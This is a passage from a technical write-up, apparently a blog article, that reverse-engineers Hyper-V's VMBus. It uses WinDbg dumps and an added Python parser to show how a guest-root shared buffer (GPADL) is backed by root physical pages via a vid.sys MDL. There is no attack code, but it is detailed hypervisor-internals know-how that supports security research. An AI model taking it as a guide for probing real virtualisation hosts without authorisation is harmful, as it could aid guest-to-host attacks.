<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827240 0002d5c0 00000000 0002d5c1 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827250 0002d5c2 00000000 0002d5c3 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827260 0002d5c4 00000000 0002d5c5 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827270 0002d5c6 00000000 00065d63 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Immediately after the function returns, [rsp+30h] holds a pointer to the new MDL:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="155" src="https://lh4.googleusercontent.com/qg-zQNQUo0CLZh74KY2nCGSe2I4oN_REk6DJSIGD8nZUUPshSi5GKP837U5aKlwwuyLkxez8gcoGYfB7ssg-vkArH8Fr_CeeCW3uXOH6GMMr5fg_gHrgSM5bSBOkrzwTARBQfFMQ5Hu5gBhe" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="279" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This MDL holds the root OS PFNs that back the guest pages:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="171" src="https://lh5.googleusercontent.com/yG8Iyl9GZy3qaHYm9fxnGAg2BxIc8P0GBGKDvFi7o6PVzKiIoMiukPsXNeQ7lQDBYu7KeO2-M3hB3E3ClLH-81j8JwmuT4uIfPU2jLJmSo57sJnQkR6PmbKuVqWx22mGGgcnG3Mroklu-LJ6" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="302" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0xffffe001`ae827180</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827180 00000000 00000000 00020090 ffffe001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827190 ab49f900 ffffe001 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae8271a0 00000000 00000000 0000c000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae8271b0 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">001367bb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 001367bc 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae8271c0 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">001367bd</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 001367be 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae8271d0 001367bf 00000000 001367c0 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae8271e0 001367c1 00000000 001367c2 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae8271f0 001367c3 00000000 001367c4 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After this the root OS sends a CHANNELMSG_OPENCHANNEL_RESULT message, which completes activation of the Data Exchange integration component. The result is a shared buffer visible to both the guest and the root OS. You can verify this by writing arbitrary bytes into the buffer from inside the guest OS. Note that !ed and !db operate on physical addresses: on the guest side, 2d5bb000 is guest physical page 0x2d5bb, the first entry of the page list above. For example:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!ed 2d5bb000 aaaaaaaa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!db 2d5bb000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#2d5bb000 aa aa aa aa 10 19 00</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On the root side, read the physical page whose PFN the vid.sys function returned (0x1367bb, the first entry of the MDL) and the same bytes appear:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!db 1367bb000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1367bb000 aa aa aa aa 10 19</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The values match, so this really is the same physical memory area used by both the guest and the root OS: guest physical page 0x2d5bb is backed by root physical page 0x1367bb.</span></div>
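<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To tie the two dumps together, here is an added Python example (not from the original article and not vid.sys code) that parses the dd output shown above, decodes the x64 MDL header and its PFN_NUMBER array, pairs each guest page with the root page behind it, and translates a guest physical address inside the GPADL to a root physical address. The layout assumed for the guest page list (a 64-bit byte count followed by 64-bit guest PFNs) is read off the dump, not taken from a Microsoft header; the MDL dump on the page stops after ten PFNs, so the map covers ten of the twelve pages.</span></div>

```python
"""Pair the guest page list passed to vid.sys with the root-side MDL it produced (dumps above)."""
import struct

PAGE = 0x1000

# Constructed from the two `dd` dumps on this page; the MDL dump is truncated after ten PFNs.
GUEST_RANGE_DUMP = """\
ffffe001`ae827210 0000c000 00000000 0002d5bb 00000000
ffffe001`ae827220 0002d5bc 00000000 0002d5bd 00000000
ffffe001`ae827230 0002d5be 00000000 0002d5bf 00000000
ffffe001`ae827240 0002d5c0 00000000 0002d5c1 00000000
ffffe001`ae827250 0002d5c2 00000000 0002d5c3 00000000
ffffe001`ae827260 0002d5c4 00000000 0002d5c5 00000000
ffffe001`ae827270 0002d5c6 00000000 00065d63 00000000
"""
ROOT_MDL_DUMP = """\
ffffe001`ae827180 00000000 00000000 00020090 ffffe001
ffffe001`ae827190 ab49f900 ffffe001 00000000 00000000
ffffe001`ae8271a0 00000000 00000000 0000c000 00000000
ffffe001`ae8271b0 001367bb 00000000 001367bc 00000000
ffffe001`ae8271c0 001367bd 00000000 001367be 00000000
ffffe001`ae8271d0 001367bf 00000000 001367c0 00000000
ffffe001`ae8271e0 001367c1 00000000 001367c2 00000000
ffffe001`ae8271f0 001367c3 00000000 001367c4 00000000
"""


def dd_to_bytes(dump):
    """Turn WinDbg `dd` output back into the little-endian bytes it displayed."""
    out = bytearray()
    for line in dump.splitlines():
        fields = line.split()
        for dword in fields[1:]:            # fields[0] is the address column
            out += struct.pack("<I", int(dword, 16))
    return bytes(out)


def parse_guest_range(dump):
    """Assumed layout, read off the dump: a 64-bit byte count followed by 64-bit guest PFNs."""
    data = dd_to_bytes(dump)
    byte_count = struct.unpack_from("<Q", data, 0)[0]
    n = byte_count // PAGE
    return byte_count, list(struct.unpack_from("<%dQ" % n, data, 8))


def parse_mdl(dump):
    """Decode the fixed x64 MDL header: Size/MdlFlags at +8, ByteCount at +0x28,
    ByteOffset at +0x2C, PFN_NUMBER (8-byte) array at +0x30."""
    data = dd_to_bytes(dump)
    size, flags = struct.unpack_from("<HH", data, 8)        # 0x2 == MDL_PAGES_LOCKED
    byte_count, byte_offset = struct.unpack_from("<II", data, 0x28)
    available = (len(data) - 0x30) // 8                     # the dump may be truncated
    n = min(byte_count // PAGE, available)
    pfns = list(struct.unpack_from("<%dQ" % n, data, 0x30))
    # Consistency check: Size must cover the header plus one PFN_NUMBER per page (0x30 + 12*8 = 0x90).
    expected_size = 0x30 + 8 * (byte_count // PAGE)
    return {"size": size, "flags": flags, "byte_count": byte_count,
            "byte_offset": byte_offset, "pfns": pfns, "size_ok": size == expected_size}


def build_map(guest_pfns, root_pfns):
    """Guest PFN -> root PFN, pairing the i-th guest page with the i-th MDL entry."""
    return dict(zip(guest_pfns, root_pfns))


def guest_to_root(gpa, mapping):
    """Translate a guest physical address inside the GPADL to the root physical address."""
    root_pfn = mapping.get(gpa >> 12)
    if root_pfn is None:
        return None                          # page not covered by (the dumped part of) the GPADL
    return (root_pfn << 12) | (gpa & (PAGE - 1))


def translate_from_dumps(gpa, guest_dump=GUEST_RANGE_DUMP, mdl_dump=ROOT_MDL_DUMP):
    """Convenience: build the map from the two dumps and translate one guest PA."""
    _, guest = parse_guest_range(guest_dump)
    mapping = build_map(guest, parse_mdl(mdl_dump)["pfns"])
    return guest_to_root(gpa, mapping)


if __name__ == "__main__":
    byte_count, guest = parse_guest_range(GUEST_RANGE_DUMP)
    mdl = parse_mdl(ROOT_MDL_DUMP)
    print("GPADL: %#x bytes, %d guest pages; MDL Size=%#x MdlFlags=%#x size_ok=%s"
          % (byte_count, len(guest), mdl["size"], mdl["flags"], mdl["size_ok"]))
    for gpfn, rpfn in build_map(guest, mdl["pfns"]).items():
        print("guest pfn %#x -> root pfn %#x" % (gpfn, rpfn))
    print("guest PA 0x2d5bb000 -> root PA %#x" % translate_from_dumps(0x2d5bb000))
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Size field check is a cheap sanity test when reading an MDL out of a dump: 0x30 bytes of header plus one 8-byte PFN_NUMBER per page of ByteCount gives exactly the 0x90 seen at +8, and MdlFlags 0x2 is MDL_PAGES_LOCKED. Paste the two dd outputs from your own session into the two strings to get the guest-to-root page map for a different GPADL.</span></div>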
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Recall from the earlier stages that activating the Data Exchange feature creates a port of type HvPortTypeEvent with TargetSint = 5. Accordingly, all events on this port in the root OS are handled by KiVmbusInterrupt1, which calls vmbusr!XPartEnlightenedIsr, which in turn calls KeInsertQueueDpc with a DPC containing:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt _KDPC @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PSHED!_KDPC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 TargetInfoAsUlong : 0x113</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Type : 0x13 ''</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x001 Importance : 0x1 ''</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x002 Number : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 DpcListEntry : _SINGLE_LIST_ENTRY</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 ProcessorHistory : 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x018 DeferredRoutine : 0xfffff800`08003de0 void </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmbusr!ParentRingInterruptDpc</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x020 DeferredContext : 0xfffff800`080130e0 Void (</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartLibContextStatic</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x028 SystemArgument1 : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x030 SystemArgument2 : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x038 DpcData : (null)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentRingInterruptDpc calls vmbusr!PkGetReceiveBuffer:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`fcc1ea38 fffff800`6cdc440c vmbusr!PkGetReceiveBuffer+0x2c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`fcc1ea40 fffff800`6cdc41a7 vmbusr!PipeTryReadSingle+0x3c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`fcc1eaa0 fffff800`6cdc4037 vmbusr!PipeProcessDeferredReadWrite+0xe7</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`fcc1eaf0 fffff800`6c96535e vmbusr!PipeEvtChannelSignalArrived+0x63</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`fcc1eb30 fffff800`6cdc4e3d vmbkmclr!KmclpVmbusManualIsr+0x16</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`fcc1eb60 fffff800`fb2d31e0 vmbusr!ParentRingInterruptDpc+0x5d</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Put a breakpoint on vmbusr!PkGetReceiveBuffer and run our PowerShell script. When the breakpoint triggers you will see that the function receives a pointer to a structure in rcx, and that the qword at rcx+18h is a pointer to the memory block:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>? poi(@rcx+18)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Evaluate expression: -52770386006016 = ffffd001`6fe33000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!pte ffffd001`6fe33000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VA ffffd0016fe33000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PXE at FFFFF6FB7DBEDD00 PPE at FFFFF6FB7DBA0028 PDE at FFFFF6FB74005BF8 PTE at FFFFF6E800B7F198</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">contains 0000000000225863 contains 00000000003B7863 contains 000000010FB12863 contains 80000001367BB963</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pfn 225 ---DA--KWEV pfn 3b7 ---DA--KWEV pfn 10fb12 ---DA--KWEV pfn </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1367bb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> -G-DA--KW-V</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r cr3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cr3=00000000001ab000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!vtop 1ab000 ffffd0016fe33000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: Virt ffffd001`6fe33000, pagedir 1ab000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: PML4E 1abd00</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: PDPE 225028</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: PDE 3b7bf8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: PTE 00000001`0fb12198</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: Mapped phys 00000001`367bb000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Virtual address ffffd0016fe33000 translates to physical address </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1367bb000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></div>
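<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
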